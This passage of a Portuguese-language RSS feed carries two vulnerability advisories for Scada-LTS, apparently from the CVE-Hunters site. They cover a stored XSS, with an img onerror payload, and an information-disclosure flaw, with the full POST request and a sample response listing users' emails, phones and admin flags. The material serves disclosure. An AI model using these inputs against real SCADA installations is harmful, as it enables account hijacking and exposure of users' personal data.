&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9138&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9138&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;pointHierarchy/new/&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos via path parameter. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;pointHierarchy/new/&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9138-cross-site-scripting-xss-armazenado-no-endpoint-pointhierarchynew-via-path-parameter&amp;#34;&amp;gt;CVE-2025-9138: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;pointHierarchy/new/&amp;lt;/code&amp;gt; via path parameter
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9138&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9138&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;pointHierarchy/new/&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos via path parameter. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;pointHierarchy/new/&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário via path parameter. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(10)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9138/image.png&amp;#34;
	width=&amp;#34;667&amp;#34;
	height=&amp;#34;315&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9138/image_hu_a00d5e9a8a813e04.png 480w, /p/cve-2025-9138/image_hu_197f1e93b2a183a9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;211&amp;#34;
		data-flex-basis=&amp;#34;508px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9138.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9138.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 19 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9139</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9139/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9139/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9139-divulgação-de-informações-confidenciais-do-usuário-por-meio-do-endpoint-watchlistdwrinitdwr&amp;#34;&amp;gt;CVE-2025-9139: Divulgação de informações confidenciais do usuário por meio do endpoint &amp;lt;code&amp;gt;WatchListDwr.init.dwr&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9139&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9139&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade foi identificada no endpoint &amp;lt;code&amp;gt;WatchListDwr.init.dwr&amp;lt;/code&amp;gt; do SCADA-LTS que permite que qualquer usuário autenticado, mesmo com permissões mínimas, acesse informações confidenciais do usuário, incluindo nomes de usuário, e-mails, números de telefone e status de administrador. Esta falha constitui um problema de &amp;lt;b&amp;gt;Divulgação de Informações&amp;lt;/b&amp;gt; e pode ser usada para facilitar ataques futuros, como phishing, escalonamento de privilégios ou engenharia social.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9139-divulgação-de-informações-confidenciais-do-usuário-por-meio-do-endpoint-watchlistdwrinitdwr&amp;#34;&amp;gt;CVE-2025-9139: Divulgação de informações confidenciais do usuário por meio do endpoint &amp;lt;code&amp;gt;WatchListDwr.init.dwr&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9139&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9139&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade foi identificada no endpoint &amp;lt;code&amp;gt;WatchListDwr.init.dwr&amp;lt;/code&amp;gt; do SCADA-LTS que permite que qualquer usuário autenticado, mesmo com permissões mínimas, acesse informações confidenciais do usuário, incluindo nomes de usuário, e-mails, números de telefone e status de administrador. Esta falha constitui um problema de &amp;lt;b&amp;gt;Divulgação de Informações&amp;lt;/b&amp;gt; e pode ser usada para facilitar ataques futuros, como phishing, escalonamento de privilégios ou engenharia social.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Endpoint vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;POST /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Autenticação necessária:&amp;lt;/b&amp;gt; Sim (usuário com privilégios baixos)&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Parâmetro afetado:&amp;lt;/b&amp;gt; N/A (chamada DWR estática)&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Tipo de impacto:&amp;lt;/b&amp;gt; Divulgação de informações&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Ao emitir uma solicitação POST elaborada para o endpoint vulnerável, um usuário com privilégios baixos consegue recuperar Informações detalhadas de todos os usuários do sistema. O backend responde com um objeto JavaScript completo contendo dados como nomes de usuário, e-mails, sinalizadores de administrador e números de telefone.
&amp;lt;h3 id=&amp;#34;exemplo-de-solicitação&amp;#34;&amp;gt;Exemplo de solicitação:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: kubernetes.docker.internal:8080
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: text/plain
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;callCount=1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;page=/Scada-LTS/watch_list.shtm
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;httpSessionId=
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;scriptSessionId=XYZ123456789
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;c0-scriptName=WatchListDwr
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;c0-methodName=init
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;c0-id=0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;batchId=1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;exemplo-de-snippet-de-resposta&amp;#34;&amp;gt;Exemplo de snippet de resposta::
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;javascript
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s7.admin=true;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s7.email=&amp;amp;#34;admin@yourMangoDomain.com&amp;amp;#34;;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s7.username=&amp;amp;#34;admin&amp;amp;#34;;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s8.admin=false;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s8.email=&amp;amp;#34;anonymous@mail.com&amp;amp;#34;;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s8.username=&amp;amp;#34;anonymous&amp;amp;#34;;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s11.admin=false;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s11.email=&amp;amp;#34;user1@x.com&amp;amp;#34;;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s11.phone=&amp;amp;#34;13212313131&amp;amp;#34;;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s11.username=&amp;amp;#34;user1&amp;amp;#34;;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;autentique-como-qualquer-usuário-válido-com-poucos-privilégios&amp;#34;&amp;gt;Autentique como qualquer usuário válido com poucos privilégios.
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9139/image.png&amp;#34;
	width=&amp;#34;1902&amp;#34;
	height=&amp;#34;320&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9139/image_hu_c33d08b2cce4521c.png 480w, /p/cve-2025-9139/image_hu_7747a0e6ad4d8864.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;594&amp;#34;
		data-flex-basis=&amp;#34;1426px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;envie-a-solicitação-post-acima-para-scada-ltsdwrcallplaincallwatchlistdwrinitdwr&amp;#34;&amp;gt;Envie a solicitação POST acima para &amp;lt;code&amp;gt;/Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr&amp;lt;/code&amp;gt;
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9139/image-1.png&amp;#34;
	width=&amp;#34;1680&amp;#34;
	height=&amp;#34;776&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9139/image-1_hu_ff5188c788d16204.png 480w, /p/cve-2025-9139/image-1_hu_73d12e3ba16d4378.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;216&amp;#34;
		data-flex-basis=&amp;#34;519px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;observe-a-resposta-do-servidor-contendo-informações-confidenciais-de-todos-os-usuários-do-sistema-scada&amp;#34;&amp;gt;Observe a resposta do servidor contendo informações confidenciais de todos os usuários do sistema SCADA.
&amp;lt;/h3&amp;gt;&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Violação de Privacidade: E-mails, números de telefone e nomes de usuário de todos os usuários, incluindo administradores, são expostos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Suporte para Escalação de Privilégios: O conhecimento dos nomes de usuário e funções dos administradores pode ser utilizado em ataques futuros.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Phishing e Engenharia Social: Informações de contato expostas podem ser usadas para criar ataques altamente direcionados.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Reconhecimento: Os invasores podem mapear a estrutura de usuários do sistema SCADA-LTS para posterior exploração.
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-9139.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
